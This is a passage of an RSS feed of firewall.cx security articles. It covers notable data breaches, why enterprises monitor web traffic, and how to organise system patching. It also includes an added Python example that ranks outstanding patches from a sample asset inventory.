<h4 style="text-align: justify;">Snapchat.com – 4.6 Million Username Accounts &amp; Phone numbers</h4>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/implications-of-unsecure-webservers-websites-5.png" alt="implications-of-unsecure-webservers-websites-5" style="margin: 7px; float: left;" title="The Implications of unsecure webservers &amp; websites SnapChat.com" />In January 2014, Snapchat’s popular website had over <strong>4.6 million</strong> usernames and phone numbers exposed due to a brute force enumeration attack against their Snapchat API. The information was publicly posted on several other sites, creating a major security concern for Snapchat and its users.<br />[Source: cnbc.com website]</p>
<h4 style="text-align: justify;">USA Businesses: Nasdaq, 7-Eleven and others – 160 Million Credit &amp; Debit Cards</h4>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/implications-of-unsecure-webservers-websites-6.png" alt="implications-of-unsecure-webservers-websites-6" style="margin: 7px; float: left;" title="The Implications of unsecure webservers &amp; websites Nasdaq" />In 2013 a massive underground attack was uncovered, revealing that <strong>over 160 million credit and debit cards</strong> were stolen during the past seven years. Five Russians and Ukrainians used advanced hacking techniques to steal the information during these years.&nbsp; Attackers targeted over <strong>800,000 bank accounts</strong> and penetrated servers used by the Nasdaq stock exchange.<br />[Source: nydailynews.com website]</p>
<h4 style="text-align: justify;">AT&amp;T - 114,000 iPad Owners (Includes White House Officers, US Senate &amp; Military Officials)</h4>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/implications-of-unsecure-webservers-websites-7.png" alt="implications-of-unsecure-webservers-websites-7" style="margin: 7px; float: left;" title="The Implications of unsecure webservers &amp; websites AT&amp;T" />In 2010, a major security breach on AT&amp;T’s website compromised <strong>over 114,000 customer accounts</strong>, revealing names, email addresses and other information. AT&amp;T acknowledged the attack on its webservers and commented that the risk was limited to the subscriber’s email address.<br />Amongst the list were apparently officers from the White House, members of the US Senate, staff from NASA, the New York Times, Viacom, Time Warner, bankers and many more. [Source: theguardian.com website]</p>
<h4 style="text-align: justify;">Target - 98 Million Credit &amp; Debit Cards Stolen</h4>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/implications-of-unsecure-webservers-websites-8.png" alt="implications-of-unsecure-webservers-websites-8" style="margin: 7px; float: left;" title="The Implications of unsecure webservers &amp; websites Target" />In 2013, between 27 November and 15 December, more than <strong>98 million credit and debit card accounts</strong> were stolen from <strong>1,787 Target stores</strong> across the United States. Hackers managed to install malware on Target’s computer systems to capture customers’ cards and then installed exfiltration malware to move the stolen credit card numbers to staging points around the United States in order to cover their tracks. The information was then moved to the hackers’ computers located in Russia.</p>
<p style="text-align: justify;">The odd part of this security breach is that the infiltration was caught by FireEye – the $1.6 million malware detection tool purchased by Target. However, according to online sources, when the alarm was raised at the security team in Minneapolis, no action was taken, while <strong>40 million credit card numbers</strong> and <strong>70 million addresses</strong>, phone numbers and other records were pulled out of Target’s mainframes!&nbsp; [Source: Bloomberg website]</p>
<p class="box-info" style="text-align: justify;">SQL Injections &amp; Cross-Site Scripting are among the most popular attack methods on Websites and Web Applications. Security tools such as Web Vulnerability Scanners allow us to uncover these vulnerabilities and fix them before hackers exploit them.</p>
<h4 style="text-align: justify;">Implications for Organizations &amp; Businesses</h4>
<p style="text-align: justify;">It goes without saying that organizations suffer major damages and losses when it comes to security breaches. When a security breach affects millions of users, as in the above examples, it’s almost impossible to calculate an exact dollar ($) figure.</p>
<p style="text-align: justify;"><strong>Security Experts agree</strong> that <strong>data security breaches</strong> are among the <strong>biggest challenges</strong> organizations face today as the problem has both <strong>financial</strong> and <strong>legal</strong> implications.</p>
<p style="text-align: justify;"><strong>Business Loss</strong> is the biggest contributor to overall data breach costs and this is because it breaks down into a number of other sub-categories, of which the most important are outlined below:</p>
<ul class="check">
<li style="text-align: justify;"><strong>Detection of the data breach</strong>. Depending on the type of security breach, the business can lose substantial amounts of money until the breach is successfully detected. Common examples are a defaced website, customer orders and credit card information being redirected to hackers, and orders being manipulated or declined.</li>
<li style="text-align: justify;"><strong>Escalation Costs</strong>. Once the security breach has been identified, emergency security measures are usually put into action. This typically involves bringing in Internet security specialists, the cybercrime unit (police) and other forces, to help identify the source of the attack and damage it has caused. Data backups are checked for their integrity and everyone is on high-alert.</li>
<li style="text-align: justify;"><strong>Notification Costs</strong>. Customers and users must be notified as soon as possible. Email alerts, phone calls and other means are used to get in contact with the customers and request them to change passwords, details and other sensitive information. The company might also need to put together a special team that will track and monitor customer responses and reactions.</li>
<li style="text-align: justify;"><strong>Customer Attrition</strong>. Also known as customer defection. After a serious incident involving sensitive customer data being exposed, customers are more likely to stop purchasing and using the company’s services. Initially gaining a customer’s trust requires sacrifices and hard work – trying to regain it after such an incident means even more sacrifices and significantly greater costs. In many cases, customers choose to not deal with the company ever again, costing it thousands or millions of dollars.</li>
<li style="text-align: justify;"><strong>Legal Implications</strong>. In many cases, customers have turned against companies after their personal information was exposed by a security breach. Legal actions against companies are usually followed by lengthy lawsuits which end up costing thousands of dollars, not to mention any financial compensation that will be awarded to the end customers.&nbsp; One example is Target’s security breach mentioned previously; the company is now facing multiple lawsuits from customers.</li>
</ul>
<p style="text-align: justify;">As outlined previously, the <strong>risk for organizations is high</strong> and there is a lot at stake from both a <strong>financial</strong> and a <strong>legal perspective</strong>.&nbsp; The <strong>security breach</strong> examples mentioned in this article illustrate how big and serious a security breach can become, as well as the <strong>implications for companies and customers</strong>. Our next article will focus on <strong>guidelines</strong> that can <strong>help</strong> us <strong>prevent data breaches</strong> and <strong>help our organization</strong>, <strong>company</strong> or <strong>business</strong> to deal with them.</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Tue, 03 Feb 2015 03:15:13 +1100</pubDate>
		</item>
		<item>
			<title>The Importance of Monitoring and Controlling Web Traffic in Enterprise &amp; SMB Networks - Protecting from Malicious Websites - Part 1</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/security-protect-enterprise-smb-network-web-monitoring-part1.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/security-protect-enterprise-smb-network-web-monitoring-part1.html</guid>
			<description><![CDATA[<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/security-protect-enterprise-smb-network-web-monitoring-p1-1.jpg" alt="security-protect-enterprise-smb-network-web-monitoring-p1-1" style="margin: 7px; float: left;" title="Network Pulse - monitoring" />This article expands on our popular <a href="https://www.firewall.cx/tools-tips-reviews/security-articles.html" target="_blank" title="Network Security Articles">security articles</a> (<a href="https://www.firewall.cx/tools-tips-reviews/security-articles/protecting-enterprise-smb-by-patching-systems.html" target="_blank" title="The importance of patching enterprise and SMB network systems">Part 1</a> &amp; <a href="https://www.firewall.cx/tools-tips-reviews/security-articles/protecting-enterprise-smb-by-patching-systems-part-2.html" target="_blank" title="The importance of patching enterprise and SMB network systems - Part 2">Part 2</a>) that covered the <a href="https://www.firewall.cx/tools-tips-reviews/security-articles/protecting-enterprise-smb-by-patching-systems.html" target="_blank" title="importance of patching enterprise and SMB network systems">importance of patching enterprise and SMB network systems</a> to <strong>protect them from hijacking</strong>, <strong>hacking attempts</strong>, <strong>unauthorized access to sensitive data</strong> and more. While <strong>patching systems is essential</strong>, another equally important step is the <strong>monitoring of Web traffic</strong> to <strong>control user activity</strong> on the web and <strong>prevent users</strong> from <strong>accessing dangerous sites</strong> and Internet resources that could jeopardize the company’s security.</p>
<p style="text-align: justify;">The ancient maxim – <strong>prevention is better than cure</strong> – holds true in cyberspace as well, and it is prudent to detect signs of trouble early, before they snowball into something uncontrollable. One of the best means of such prevention is monitoring web traffic to locate potential sources of trouble.</p>
<p style="text-align: justify;">Even if attackers are unable to gain access to your network, they can still hold you to ransom by launching a <strong>Distributed Denial of Service</strong> or <strong>DDoS attack</strong>, wherein they choke the bandwidth of your network. Regular customers will not be able to gain access to your servers. Generally, downtime for any company these days translates to loss of income and damage to the company’s reputation. Attackers these days might also refuse to relent until a ransom amount is paid up. Sounds a bit too far-fetched? Not really.</p>
<h2 style="text-align: justify;">Live Attacks &amp; Hacking Attempts On The Internet</h2>
<p style="text-align: justify;">It’s hard to imagine what is really happening right now on the Internet: how many attacks are taking place, the magnitude of these attacks, the services used to launch attacks, attack origins, attack targets and much more. Hopefully we’ll be able to help change that for you right now…</p>
<p style="text-align: justify;">The screenshot below was taken after monitoring the <a href="https://www.digitalattackmap.com/" target="_blank" rel="nofollow noopener" title="Norse network">Norse network</a> which <strong>collects and analyzes live threat intelligence</strong> from darknets in hundreds of locations in over <strong>40 countries</strong>. The attacks are taken from a small subset of live flows against the <strong>Norse honeypot infrastructure</strong> and <strong>represent actual worldwide cyber-attacks</strong>:</p>
<p style="text-align: center;"><a href="https://www.firewall.cx//images/stories/security-protect-enterprise-smb-network-web-monitoring-p1-2b.png" target="_blank" title="Internet Attacks - live on the Internet"><img src="https://www.firewall.cx//images/stories/security-protect-enterprise-smb-network-web-monitoring-p1-2a.jpg" alt="security-protect-enterprise-smb-network-web-monitoring-p1-2a" style="margin: 7px auto; display: block; vertical-align: middle;" title="Live Internet Attacks - Sample of 15 minutes with over 5800 targets" /></a>Click to enlarge</p>
<p style="text-align: justify;">In around <strong>15 minutes</strong> of monitoring attacks, we saw more than <strong>5000 different origins</strong> launching attacks against over <strong>5800 targets</strong>, of which <strong>99% of the targets</strong> were located in the <strong>United States</strong> and <strong>50% of the attack origins were from China</strong>.</p>
<p style="text-align: justify;">The sad truth is that the majority of these attacks are initiated from compromised computer systems &amp; servers with unrestricted web access. All it takes today is for one system to visit an infected site, and that could be enough to bring down the whole enterprise network infrastructure while at the same time launching a massive attack against Internet targets.</p>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/security-protect-enterprise-smb-network-web-monitoring-p1-3.jpg" alt="security-protect-enterprise-smb-network-web-monitoring-p1-3" style="margin: 7px; float: left;" title="Evernote Hacked" />In June 2014, <strong>Evernote</strong> and <strong>Feedly</strong>, working largely in tandem, went down with a <strong>DDoS attack</strong> within two days of each other. <strong>Evernote</strong> recovered the same day, but <strong>Feedly</strong> had to suffer more. Although there were <strong>two more DDoS attacks</strong> on Feedly that caused it to lose business for another two days, normalcy was finally restored. According to the CEO of Feedly, they refused to give in to the demands of ransom in exchange for ending the attack and were successful in neutralizing the threat.</p>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/security-protect-enterprise-smb-network-web-monitoring-p1-4.jpg" alt="security-protect-enterprise-smb-network-web-monitoring-p1-4" style="margin: 7px; float: left;" title="Domino Pizza Hacked" /><strong>Domino's Pizza</strong> had over <strong>600,000 Belgian and French customer records stolen</strong> by the hacking group Rex Mundi. The <strong>attackers demanded $40,000</strong> from the fast food chain in exchange for not publishing the data online. It is not clear whether Domino's complied with the ransom demands. However, they reassured their customers that although the attackers did have their names, addresses and phone numbers, they were unsuccessful in stealing their financial and banking information. The <strong>Twitter account</strong> of the <strong>hacking group</strong> was <strong>suspended</strong>, and they never released the information.</p>
<p style="text-align: justify;">Apart from external attacks, misbehavior from employees can cause equal if not <strong>greater damage</strong>. Employees viewing pornographic material in the workplace can lead to a huge number of issues. Not only is porn one of the biggest <strong>time wasters</strong>, it chokes up the <strong>network bandwidth</strong> with <strong>non-productive downloads</strong>, bringing in <strong>unwanted viruses</strong>, malware and <strong>Trojans</strong>. Co-workers unwillingly exposed to offensive images can find the workplace uncomfortable, and this may further lead to charges of sexual harassment, dismissals and lawsuits, all expensive and disruptive.</p>
<p style="text-align: justify;">Another major problem is <strong>data leakage</strong> via <strong>e-mail</strong> or <strong>webmail</strong> – <strong>intended</strong> or <strong>by accident</strong>. Client data, unreleased financial data and confidential plans leaked through emails may cause devastating impact to the business including <strong>loss of client confidence</strong>.</p>
<p style="text-align: justify;"><strong>Web monitoring</strong> provides <strong>answers</strong> to several of these problems. This type of monitoring need not be very intrusive or onerous, but with the right policies and training, employees easily learn to differentiate between appropriate and inappropriate use.</p>
<h2 style="text-align: justify;">A Few Of The Biggest Web Problems</h2>
<p style="text-align: justify;">To monitor the web, you must know the issues that you need to focus on. Although organizations differ in their values, policies and culture, there are some common major issues on the Web that cause the biggest headaches:</p>
<ul class="checkbox">
<li style="text-align: justify;"><strong>Torrents</strong> And <strong>Peer-To-Peer Networks</strong> offer free software, chat, music and video, which can be easily downloaded. However, this can hog the bandwidth, causing <strong>disruptions</strong> in operations such as <strong>video conferencing</strong> and <strong>VoIP</strong>. Moreover, such sites also contain pirated software, bootlegged movies and inappropriate content that are mostly tainted with various types of viruses and Trojans.</li>
<li style="text-align: justify;"><strong>Gaming sites</strong> are notorious for hogging bandwidth and wasting productive time. Employees often find these sites hard to resist and download games. Many of the games carry lethal payloads of viruses and other malware, and attackers commonly use them as a vehicle for SEO poisoning. Even when safe, games disrupt productivity and clog the network.</li>
<li style="text-align: justify;"><strong>Fun sites</strong>, although providing a harmless means of relieving stress, may be offensive and inappropriate to coworkers. Whether or not your policies allow such humor sites, they can contain SEO-poisoned links and Trojans, and their video components often clog networks.</li>
<li style="text-align: justify;"><strong>Online Shopping</strong> may relate to purchase of work-appropriate items as well as personal. Although the actual purchase may not take up much time, surfing for the right product is a huge time waster, especially for personal items. Individual policies may either limit the access to certain hours of the day or block these sites altogether.</li>
<li style="text-align: justify;"><strong>Non-Productive Surfing</strong> can be a huge productivity killer for any organization. Employees may be obsessed with tracking shares, sports news or deals on commercial sites such as Craigslist and eBay. Company policies can block access to such sites entirely, or limit the time spent on such sites to only during lunchtime.</li>
</ul>
<p style="text-align: justify;">According to a survey involving over <strong>3,000 employees</strong>, Salary.com found <strong>over 60%</strong> involved in visiting sites unrelated to their work every day. <strong>More than 20%</strong> spent above <strong>five hours a week</strong> on <strong>non-work related sites</strong>. Nearly half of those surveyed looked for a new job using office computers in their work time.</p>
<p style="text-align: justify;">In the next part of our article, we will examine the importance of putting in place a company security policy to help stop users visiting sites they shouldn't, stop wasting valuable time and resources on activities that can compromise the enterprise's network security, and more. We also take an in-depth look at how to effectively monitor and control traffic activity on the Web in real time, plus much more.</p>
]]></description>
			<category>Security Articles</category>
			<pubDate>Thu, 20 Nov 2014 08:47:46 +1100</pubDate>
		</item>
		<item>
			<title>Protect Enterprise &amp; SMB Networks From Exploits, Hacking &amp; Attacks By Correctly Patching Systems</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/protecting-enterprise-smb-by-patching-systems.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/protecting-enterprise-smb-by-patching-systems.html</guid>
			<description><![CDATA[<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/protecting-enterprise-smb-by-patching-systems-1.jpg" alt="protecting-enterprise-smb-by-patching-systems-1" style="margin: 7px; float: left;" title="Protect Enterprise Systems from Hacking by Patching them" /><strong>Protecting Enterprise</strong> and <strong>Small-Medium Business networks</strong> from <strong>exploits</strong> and <strong>hacking attempts</strong> is not an easy task.</p>
<p style="text-align: justify;">Each year software giants release new systems that bring new features and functionality to <strong>Enterprise</strong> and <strong>SMB companies</strong> aiming to increase collaboration, productivity, and generally make life easier for everyone, except IT Managers, System Engineers and Administrators.</p>
<p style="text-align: justify;">Unfortunately history has proven many times in the past that new operating systems and applications are often bundled with a generous amount of security issues which are usually detected after a security incident.</p>
<p style="text-align: justify;">Almost every company, regardless of its size, whether large or small, has faced data breaches and had important data, personal records and financial information stolen. Sadly, most companies never even know about the data breach until it's too late!</p>
<p style="text-align: justify;">For example, in May 2014, the notorious <strong>Syrian Electronic Army</strong> attacked and successfully stole credentials from <strong>eBay</strong>. They managed to steal personal records of over <strong>230 million users</strong>, compromising usernames, passwords, phone numbers and physical addresses, leaving eBay users vulnerable to identity theft.</p>
<p class="box-info" style="text-align: justify;">Did you know that the <strong>PCI Data Security Standard</strong> (<strong>PCI DSS</strong>) provides a framework for developing a robust data security process - including prevention, detection and appropriate reaction to security incidents?</p>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/protecting-enterprise-smb-by-patching-systems-3.jpg" alt="protecting-enterprise-smb-by-patching-systems-3" style="margin: 7px; float: left;" title="P.F Chang's System Hacking" />Last month, a huge data breach at <strong>P. F. Chang's</strong>, the famous restaurant chain, compromised its customers' payment information. Criminals compromised more than <strong>33 P. F. Chang's restaurants</strong> between <strong>October 2013</strong> and <strong>June 2014</strong> and recorded the data of an <strong>as-yet-unestimated number of credit and debit cards</strong> used at those locations. The stolen card data was subsequently <strong>put up for sale</strong> on the black market. The identity of the attackers has yet to be established and, worst of all, P. F. Chang's was only alerted to the breach in <strong>June 2014</strong> by the <strong>US Secret Service</strong>! It appears the company was completely unaware of what was happening for a period of over 9 months!</p>
<p style="text-align: justify;">Most of the machines that had data siphoned off them shared a common problem: they were not fully patched. It is suspected that the software running on these machines had known vulnerabilities and that the attackers used these security holes to get in and steal information. <strong>Patches are meant to fix flaws in the software</strong>, <strong>preventing attackers from gaining access through those flaws</strong>. However, applying patches in time is something most users typically delay, and the patching cycle itself adds to the security problem.</p>
<p style="text-align: justify;">Typically, vendors issue patches as they discover vulnerabilities in their software. Sometimes, security experts <strong>discover a flaw in software</strong> and <strong>publicize it even before the vendor has had time to come up with a fix</strong>. This makes all machines using the <strong>software vulnerable to attack</strong>.</p>
<p style="text-align: justify;">Furthermore, the very act of announcing a patch publicly reveals that a vulnerability exists, leaving machines exposed until the patch has actually been applied. There is usually a <strong>time lag</strong> between the <strong>announcement of the patch</strong>, <strong>acquiring it</strong> and <strong>applying it</strong>. Very few people apply a patch as soon as it is released: sometimes through oversight, but mostly as a deliberate delay while they test that the patch does not break their business processes.</p>
<p style="text-align: justify;">Attackers make use of this time lag to exploit the disclosed vulnerabilities. Since most attackers take the path of least resistance, they scan machines until they locate one that has not yet been patched, and that is where they get in. Therefore, if you put more effort into patching up front, you not only keep your own machines protected and up to date, your users also remain safe from opportunistic attackers.</p>
<p style="text-align: justify;">To defeat the attacker successfully, the organization needs to be adequately prepared. The process of securing information is not a static goal, but has to be treated as a dynamic process that requires flexible, skilled and disciplined management with a response cycle that ensures continuous improvement.</p>
<p style="text-align: justify;">Following are a few simple rules that help make the process much easier to handle:</p>
<h2 style="text-align: justify;">A Systematic Approach</h2>
<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/protecting-enterprise-smb-by-patching-systems-2.jpg" alt="protecting-enterprise-smb-by-patching-systems-2" style="margin: 7px; float: left;" title="Security Lock for patch management software" />Patching requires the IT team to be ever vigilant and thoroughly systematic. To begin with, everyone must realize the <strong>importance of patching</strong>, and it must be a team effort with wholehearted cooperation. Today, apart from the operating system, software tools from several vendors are in use simultaneously, so alongside the Windows patches and updates from Microsoft, the IT team may also have to handle fixes from vendors such as Adobe. <strong>Relying on updates from the vendors may not be enough</strong>: the IT team must also look out for white papers and other product reviews published independently.</p>
<h2 style="text-align: justify;">Manage Your Assets</h2>
<p style="text-align: justify;">Inventory your tools and systems so you know what you have. Asset management makes it easier for your IT team to know the breadth of the patch management it has to tackle. The team must keep track of every new application, service pack and patch that is installed, which makes this an ongoing job.</p>
<h2 style="text-align: justify;">Organize Your Processes</h2>
<p style="text-align: justify;">Although there are many good tools for <strong>patch management</strong>, the process is still complex and has to be handled smartly, with the right strategy and proper teamwork. If your organization is highly centralized, the IT team can work as a core group, performing the entire asset management and determining the needs and priorities of patching, including testing and rollout.</p>
<p style="text-align: justify;">For geographically distributed organizations, several local IT groups may be the norm. Although communication between the individual groups is important, each group must acquire their own tools and gain independent patching expertise.</p>
<p style="text-align: justify;">Proper patch management requires the IT team to be fully in control while end users are discouraged from doing their own patching, unless IT has provided them with detailed instructions and training for patching.</p>
<h2 style="text-align: justify;">Automate Your Processes</h2>
<p style="text-align: justify;">Nowadays, there are a <strong>few good tools available for patch management</strong> that can automate the process of <strong>patching</strong> and they work on <strong>multiple platforms</strong>. Automating the process relieves the IT team from the tedious process of having to manually test and install each patch.</p>
<p style="text-align: justify;">IT can set the automatic functions to scour for new patches constantly and organize the patches by their importance. They can also automate the process of mapping the company's vulnerabilities according to their priorities against the patches available. This provides them with a clear roadmap of what to patch and in what sequence.</p>
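<p style="text-align: justify;">The inventory-driven, prioritised patching described under Manage Your Assets and Automate Your Processes, as an added Python example (this is not code from this article or from any patch management product): it cross-references a constructed asset inventory with a constructed list of vendor advisories, flags every host still running a version older than the fix, and orders the work by severity, asset criticality and how long the fix has been public, which is the time lag discussed earlier. The host names, product names, versions, advisory IDs, the 1 to 5 criticality and 1 to 10 severity scales and the scoring weights are all assumptions made for the example.</p>

```python
"""Added example (not code from the firewall.cx article): a small patch-roadmap
builder. It cross-references an asset inventory with vendor advisories, works
out which hosts are still exposed, and orders the work by severity, asset
criticality and how long the fix has been public. Every host, product,
version and advisory ID below is a constructed placeholder."""
from dataclasses import dataclass
from datetime import date


@dataclass
class Asset:
    host: str
    criticality: int        # assumed scale: 1 (low) .. 5 (business critical)
    software: dict          # product name -> installed dotted version string


@dataclass
class Advisory:
    advisory_id: str        # placeholder identifier, not a real CVE or KB number
    product: str
    fixed_version: str      # first version that contains the fix
    severity: int           # assumed 1 .. 10 scale, CVSS-like
    released: date          # day the vendor published the fix


def version_tuple(version: str) -> tuple:
    """Turn '11.0.5' into (11, 0, 5) so versions compare numerically,
    not as strings ('11.0.10' must sort after '11.0.9')."""
    return tuple(int(part) for part in version.split("."))


def is_affected(installed: str, fixed_version: str) -> bool:
    """A host stays exposed while its installed version predates the fix."""
    return version_tuple(installed) < version_tuple(fixed_version)


def build_roadmap(assets, advisories, today):
    """Return the (host, advisory) pairs still needing a patch, highest
    priority first. Assumed scoring: severity x asset criticality, plus one
    point for every week the fix has been available but not applied."""
    work = []
    for asset in assets:
        for adv in advisories:
            installed = asset.software.get(adv.product)
            if installed is None or not is_affected(installed, adv.fixed_version):
                continue
            days_exposed = (today - adv.released).days
            score = adv.severity * asset.criticality + days_exposed // 7
            work.append({
                "host": asset.host,
                "advisory_id": adv.advisory_id,
                "product": adv.product,
                "installed": installed,
                "fixed_version": adv.fixed_version,
                "days_exposed": days_exposed,
                "score": score,
            })
    # Highest score first; the host name breaks ties so the order is stable.
    work.sort(key=lambda item: (-item["score"], item["host"]))
    return work


def exposure_by_advisory(roadmap):
    """Count how many hosts each advisory still leaves unpatched: a quick
    measure of the breadth of patch management the team has to tackle."""
    counts = {}
    for item in roadmap:
        aid = item["advisory_id"]
        counts[aid] = counts.get(aid, 0) + 1
    return counts


# Constructed sample inventory and advisories (not real hosts or products).
TODAY = date(2014, 7, 15)
SAMPLE_ASSETS = [
    Asset("fin-db01", 5, {"dbengine": "2.3.1", "pdfreader": "11.0.5"}),
    Asset("hr-ws07", 2, {"pdfreader": "11.0.5", "browser": "30.0.1"}),
    Asset("web-fe02", 4, {"browser": "31.0.0", "pdfreader": "11.0.9"}),
]
SAMPLE_ADVISORIES = [
    Advisory("ADV-0001", "pdfreader", "11.0.7", 9, date(2014, 6, 10)),
    Advisory("ADV-0002", "dbengine", "2.4.0", 7, date(2014, 7, 1)),
    Advisory("ADV-0003", "browser", "31.0.0", 6, date(2014, 5, 20)),
]

if __name__ == "__main__":
    roadmap = build_roadmap(SAMPLE_ASSETS, SAMPLE_ADVISORIES, TODAY)
    for item in roadmap:
        print(f'{item["score"]:3d}  {item["host"]:10s} {item["advisory_id"]}  '
              f'{item["product"]} {item["installed"]} -> {item["fixed_version"]}  '
              f'({item["days_exposed"]} days exposed)')
    print(exposure_by_advisory(roadmap))
```

<p style="text-align: justify;">With the sample data the business-critical database host comes out on top for both of its outstanding advisories, the low-criticality workstation follows, and the web front end does not appear at all because it already runs the fixed versions. In a real deployment the inventory would come from the asset management system and the advisory list from the vendors' feeds, but the ordering logic stays the same.</p>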
<p style="text-align: justify;">It is evident that companies of every size should give high priority to correctly patching their systems. <strong>Keeping systems up-to-date</strong> has proven to be an <strong>effective method against targeted attacks seeking to exploit vulnerable systems</strong>. Our <a href="https://www.firewall.cx/tools-tips-reviews/security-articles/protecting-enterprise-smb-by-patching-systems-part-2.html" target="_blank" title="Protecting Enterprise &amp; SMB Networks Part 2">next article</a> focuses on additional ways to help simplify the patching process for companies. <a href="https://www.firewall.cx/tools-tips-reviews/security-articles/protecting-enterprise-smb-by-patching-systems-part-2.html" target="_blank" title="Protecting Enterprise &amp; SMB Networks Part 2">Click Here</a> to read <strong><a href="https://www.firewall.cx/tools-tips-reviews/security-articles/protecting-enterprise-smb-by-patching-systems-part-2.html" title="Protecting Enterprise &amp; SMB Networks Part 2">Protecting Enterprise &amp; SMB Networks From Exploits, Hacking &amp; Attacks By Correctly Patching Systems - Part 2</a></strong>.</p>
]]></description>
			<category>Security Articles</category>
			<pubDate>Mon, 11 Aug 2014 03:06:26 +1000</pubDate>
		</item>
		<item>
			<title>The Most Dangerous Websites On The Internet &amp; How To Effectively Protect Your Enterprise From Them</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/the-most-dangerous-websites-and-how-to-protect-your-company.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/the-most-dangerous-websites-and-how-to-protect-your-company.html</guid>
			<description><![CDATA[<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/whitepapers/whitepaper-malicious-website-content.jpg" alt="whitepaper-malicious-website-content" width="250" height="188" style="margin: 7px; float: left; border: 1px solid #000000;" title="The Most Dangerous Websites On The Internet &amp; How To Effectively Protect Your Enterprise From Them" />Companies and users around the world are struggling to keep their network environments safe from malicious attacks and hijacking attempts by leveraging services provided by high-end firewalls, Intrusion Detection Systems (IDS), antivirus software and other means. While these appliances can mitigate attacks and hacking attempts, we often see the whole security infrastructure failing because of attacks initiated from the inside, effectively bypassing all protection offered by these systems.</p>
<p style="text-align: justify;">I’m sure most readers will agree when I say that end-users are usually responsible for attacks that originate from the internal network infrastructure. A frequent example: when users find a link while browsing the Internet, they tend to click on it to see where it goes, even when the context suggests the link may be malicious. Users are unaware of the hidden dangers and the potential damage that can be caused by clicking on such links.</p>
<p style="text-align: justify;">The implications of following links to malicious content vary from company to company; however, a few common cases are often seen or reported:</p>
<ul class="plus" style="text-align: justify;">
<li>Hijacking of the company’s VoIP system, generating huge bills from calls made to overseas destination numbers (toll fraud)</li>
<li>The company’s servers are overloaded by thousands of requests made from the infected workstation(s)</li>
<li>Sensitive information is pulled from the workstations and sent to the hackers</li>
<li>Company Email servers are used to generate and send millions of spam emails, eventually placing them on a blacklist and causing massive communication disruptions</li>
<li>Remote control software is installed on the workstations, allowing hackers to see everything the user is doing on their desktop</li>
<li>Torrents are downloaded and seeded directly from the company’s Internet lines, causing major WAN disruptions and delays</li>
</ul>
<p style="text-align: justify;">As you can see there are countless examples we can analyze to help us understand how serious the problem can become.</p>
<p style="text-align: justify;"><strong>Download this whitepaper if you are interested to:</strong></p>
<ul class="checkbox" style="text-align: justify;">
<li>Learn which are the Top 10 Dangerous sites users visit</li>
<li>Learn the Pros and Cons of each website category</li>
<li>Understand why web content filtering is important</li>
<li>Learn how to effectively block sites from compromising your network</li>
<li>Learn how to limit the amount of the time users can access websites</li>
<li>Effectively protect your network from end-user ‘mistakes’</li>
<li>Ensure user web-browsing does not abuse your Internet line or Email servers</li>
</ul>
<p class="box-hint">We apologise, however the whitepaper is no longer available from the vendor. <a href="https://www.firewall.cx/">Head to our homepage</a> to read up on new network and security related articles.</p>
]]></description>
			<category>Security Articles</category>
			<pubDate>Mon, 04 Nov 2013 06:08:01 +1100</pubDate>
		</item>
		<item>
			<title>Download Your Free Whitepaper: How to Secure your Network from Cyber Attacks</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/how-to-fight-cybercrime.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/how-to-fight-cybercrime.html</guid>
			<description><![CDATA[<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/whitepapers/whitepaper-fight-cybercrime-module.jpg" alt="whitepaper-fight-cybercrime-module" width="82" height="50" style="margin: 7px; float: left;" title="McAfee Antivirus Report" />Cybercriminals are now focusing their attention on small and mid-sized businesses because they are typically easier targets than large, multinational corporations.<br />This white paper examines the rising security threats that put small and medium businesses at risk. It also highlights important security considerations that SMBs should be aware of.</p>
<p style="text-align: justify;">Download this whitepaper if you’re interested to:</p>
<ul class="checkbox">
<li style="text-align: justify;">Learn how to adopt best practices and boost your business security.</li>
<li style="text-align: justify;">Evaluate the SMB digital footprint.</li>
<li style="text-align: justify;">Know what to look for in new security solutions.</li>
</ul>
<p class="box-hint">We apologise, however the whitepaper is no longer available from the vendor. <a href="https://www.firewall.cx">Head to our homepage</a> to read up on new network and security related articles.</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Thu, 01 Aug 2013 08:00:00 +1000</pubDate>
		</item>
		<item>
			<title>A Networked World: New IT Security Challenges</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/networked-world-new-security-challenges.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/networked-world-new-security-challenges.html</guid>
			<description><![CDATA[<p style="text-align: justify;"><img src="https://www.firewall.cx/images/stories/network-security-1.jpg" alt="network-security-1" width="250" height="187" style="margin: 7px; float: left;" />This is the age of networks. Long ago, they said, ‘the mainframe is the computer’. Then it changed to ‘the PC is the computer’. That was followed by ‘the network is the computer’. Our world has been shrunk, enlightened and sped up by this globe-encapsulating mesh of interconnectivity. Isolation is a thing of the past. Now my phone brings up my entire music collection residing on my home computer. My car navigates around the city, avoiding traffic in real time. We have started living in intelligent homes where we can control objects within them remotely.</p>
<p style="text-align: justify;">On a larger scale, our road traffic system, security CCTV, air traffic control, power stations, nuclear power plants, financial institutions and even certain military assets are administered using networks. We are all part of this great cyber space. But how safe are we? What is our current level of vulnerability?</p>
<h2>Tower, Am I Cleared For Landing?</h2>
